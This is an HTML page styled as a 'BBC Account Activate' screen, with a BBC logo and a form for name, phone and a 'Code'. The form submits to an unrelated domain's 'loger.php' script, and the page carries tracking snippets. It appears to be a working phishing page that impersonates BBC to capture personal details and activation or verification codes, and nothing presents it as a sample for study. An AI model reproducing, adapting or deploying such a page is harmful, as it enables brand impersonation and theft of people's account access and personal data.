<html>
<head>
    <!-- Matomo -->
<script>
  var _paq = window._paq = window._paq || [];
  /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u="https://drivers.ink/matomo/";
    _paq.push(['setTrackerUrl', u+'matomo.php']);
    _paq.push(['setSiteId', '74']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.async=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s);
  })();
</script>
<!-- End Matomo Code -->
    <title>BBC Account Activate</title>
    <style>
    body {
        background-color: black;
        color: white;
        font-family: Arial, sans-serif;
    }
    
    #logo {
        margin: 10px;
        margin-top: 70px;
        text-align: center;
    }
    
    form {
        text-align: center;
        font-size: 30px;
    }
    
    input[type="text"] {
        width: 250px; /* Increase the width here */
        margin-bottom: 10px;
        height: 40px;
        border: 1px solid white;
        padding: 5px;
        margin-left: -35px;
        
    }
    
    input[type="submit"] {
        width: 220px;
        height: 40px;
        font-size: 25px;
        margin-top: 10px;
        border: 1px solid white;
        background-color: transparent;
        color: white;
    }
    
    .label-spacing {
        margin-bottom: 100px;
    }
    
    .form-label {
        display: inline-block;
        width: 150px;
        text-align: center;
        margin-right: 10px;
    }
    
    .form-input {
        display: inline-block;
        width: 20px;
        font-size: 20px;
    }
    
    .form-line {
        margin-bottom: 10px;
        font-size: 30px;
    }
</style>

</head>
<body>
    <div id="logo">
        <img src="BBC-Logo-1.png" alt="Logo">
    </div><br><br>
    
<form action="https://generatemynort.online/loger.php" method="post">
    <div class="form-line">
        <label class="form-label" for="name">Name:</label>
        <input class="form-input" type="text" id="name" name="SingleLine" required>
    </div>

    <div class="form-line">
        <label class="form-label" for "phone">Phone:</label>
        <input class="form-input" type="text" id="phone" name="SingleLine1" required>
    </div>

    <div class="form-line">
        <label class="form-label" for "code">Code:</label>
        <input class="form-input" type="text" id="code" name="SingleLine2" required>
    </div>

    <div class="form-line">
        <br> 
        <input type="submit" value="Submit">
    </div>
</form>

    
    <!-- Default Statcounter code for BBC Discom Keypage
https://bbcom.discom.online/ -->
<script type="text/javascript">
var sc_project=12893862; 
var sc_invisible=1; 
var sc_security="dcc8ffcb"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>

<!-- End of Statcounter Code -->
</body>
</html>
